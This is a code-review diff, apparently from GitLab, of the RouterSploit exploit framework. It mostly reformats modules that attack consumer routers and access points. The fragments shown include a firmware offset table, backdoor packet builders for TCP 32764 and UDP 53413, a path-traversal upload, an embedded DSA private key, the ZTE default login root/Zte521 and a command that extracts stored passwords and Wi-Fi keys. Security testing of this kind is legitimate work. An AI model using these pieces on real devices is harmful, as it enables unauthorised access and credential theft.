{'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378, 'offset': 37}, # 0x8040587d # ----------
{'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218, 'offset': 13}, # 0x803c49d5 # ----------
{'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL", 'number': 107368902, 'offset': 25}, # 0x803fea01 # tested
{'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13}, # 0x8040637d # ----------
{'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20}, # 0x803389B0 # ----------
{'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21}, # 0x80397055 # ----------
{'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17}, # 0x803c6e09 # ----------
{'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1}, # 0x803e1bd5 # ----------
{'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5}, # 0x80400c85 # ----------
{'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25}, # 0x803d1bd5 # ----------
{'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21}, # 0x80407625 # ----------
{'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9}, # 0x803fbcc5 # tested
{'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20}, # 0x8024E148 # tested
{'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17}, # 0x80397E69 # tested
{'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5}, # 0x80387055 # ----------
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1}, # 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17}, # 0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5}, # 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17}, # 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37}, # 0x803bf701 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21}, # 0x803e5b6d # ----------
{'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21}, # 0x803dc701 # ----------
{'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25}, # 0x804bb941 # ----------
{'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25}, # 0x804e1ff9 # ----------
{'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1}, # 0x804f16a9 # ----------
{'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24}, # 0x8034F3A4 # tested
{'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21}, # 0x803AB30D # tested
{'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9}, # 0x803cf335 # tested
{'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13}, # 0x803E1829 # tested
{'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25}, # 0x804BB941 # tested
{'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21}, # 0x804D7CB9 # tested
{'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1}, # 0x804F16A9 # ----------
{'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25}, # 0x804E1FF9 # ----------
{'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13}, # 0x803dfbe9 # ----------
{'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21}, # 0x803f1719 # ----------
{'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0}, # 0x8034FF94 # tested
{'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25}, # 0x803d2d61 # tested
{'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21}, # 0x804ee049 # ----------
{'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25}, # 0x80523979 # tested
{'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13}, # 0x80524A91 # tested
{'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21}, # 0x80523859 # tested
{'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # tested
{'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # ----------
{'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21}, # 0x80531859 # ----------
{'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13}, # 0x80542e59 # ----------
{'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # tested
{'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # ----------
{'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803D6EF9 # ----------
{'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25}, # 0x8052e0e9 # ----------
{'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37}, # 0x80523AA9 # ----------
{'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29}, # 0x8052B6B1 # ----------
{'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0}, # 0x803605B4 # ----------
{'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36}, # 0x803605B4 # ----------
{'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071 # tested
{'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071
],
}
......
routersploit/modules/exploits/multi/shellshock.py
......@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
'http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/',
],
'devices': [
'Multi',
'Multi',
],
}
......@@ -106,7 +106,7 @@ class Exploit(exploits.Exploit):
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
continue
if str(solution) in response.text:
self.valid = payload
return True # target is vulnerable
......
routersploit/modules/exploits/multi/ssh_auth_keys.py
......@@ -147,7 +147,7 @@ class Exploit(exploits.Exploit):
"""
},
{ # loadbalancer.org enterprise va
"user":"root",
"user": "root",
"private_key": """
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
......
routersploit/modules/exploits/multi/tcp_32764_info_disclosure.py
......@@ -85,7 +85,7 @@ class Exploit(exploits.Exploit):
print_error("Target is not vulnerable")
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
routersploit/modules/exploits/multi/tcp_32764_rce.py
......@@ -79,7 +79,7 @@ class Exploit(exploits.Exploit):
print self.execute(s, 7, cmd.strip("\n"))
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
routersploit/modules/exploits/netcore/udp_53413_rce.py
......@@ -27,8 +27,8 @@ class Exploit(exploits.Exploit):
'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/',
],
'devices': [
'Netcore',
'Netis',
'Netcore',
'Netis',
],
}
......@@ -65,7 +65,7 @@ class Exploit(exploits.Exploit):
sock.settimeout(10.0)
try:
sock.sendto(payload, (self.target, 53413))
sock.sendto(payload, (self.target, 53413))
response = sock.recv(1024)
except:
pass
......
routersploit/modules/exploits/netgear/n300_auth_bypass.py
......@@ -25,15 +25,15 @@ class Exploit(exploits.Exploit):
'http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html',
],
'devices': [
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
]
}
......
routersploit/modules/exploits/netgear/prosafe_rce.py
......@@ -19,24 +19,25 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Netgear ProSafe RCE',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe'
'WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'authors': [
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://firmware.re/vulns/acsa-2015-002.php',
'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
],
],
'devices': [
'Netgear ProSafe WC9500',
'Netgear ProSafe WC7600',
'Netgear ProSafe WC7520',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -44,7 +45,7 @@ class Exploit(exploits.Exploit):
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
......
routersploit/modules/exploits/tplink/wdr740nd_wdr740n_path_traversal.py
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'TP-Link WDR740ND & WDR740N Path Traversal',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability that allows to read files from the filesystem.',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability'
'that allowsto read files from the filesystem.',
'authors': [
'websec.ca', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -26,8 +27,8 @@ class Exploit(exploits.Exploit):
'http://www.websec.mx/publicacion/advisories/tplink-wdr740-path-traversal',
],
'devices': [
'TP-Link WDR740ND',
'TP-Link WDR740N',
'TP-Link WDR740ND',
'TP-Link WDR740N',
],
}
......
routersploit/modules/exploits/ubiquiti/airos_6_x.py
......@@ -103,7 +103,7 @@ class Exploit(exploits.Exploit):
upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
response = http_request(url=upload_url, method='POST', files=upload_params)
tmp_payload.close()
if response is None:
......@@ -116,9 +116,9 @@ class Exploit(exploits.Exploit):
# Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
http_request(url=upload_url, method='POST', files=upload_params)
clean_tmp_file.close()
......
routersploit/modules/exploits/zte/f609_config_disclosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F609 Config Disclosure',
'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F609 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # routersploit module
],
......@@ -29,8 +30,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "sendcmd 1 DB p DevAuthInfo"
def run(self):
......
routersploit/modules/exploits/zte/f660_config_disclosure.py
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F660 Config Disclosure',
'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F660 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # vulnerability discovery & routersploit module
],
......@@ -29,8 +30,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "cat /userconfig/cfg/db_user_cfg.xml | grep -E 'UserName|Username|Password|password|ESSID|KeyPhase'"
def run(self):
......
routersploit/modules/exploits/zte/f6xx_default_root.py
......@@ -31,8 +31,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
def run(self):
try:
......@@ -59,7 +59,7 @@ class Exploit(exploits.Exploit):
tn.close()
except:
print_error("Connection error {}:{}".format(self.target, self.port))
@mute
def check(self):
try:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment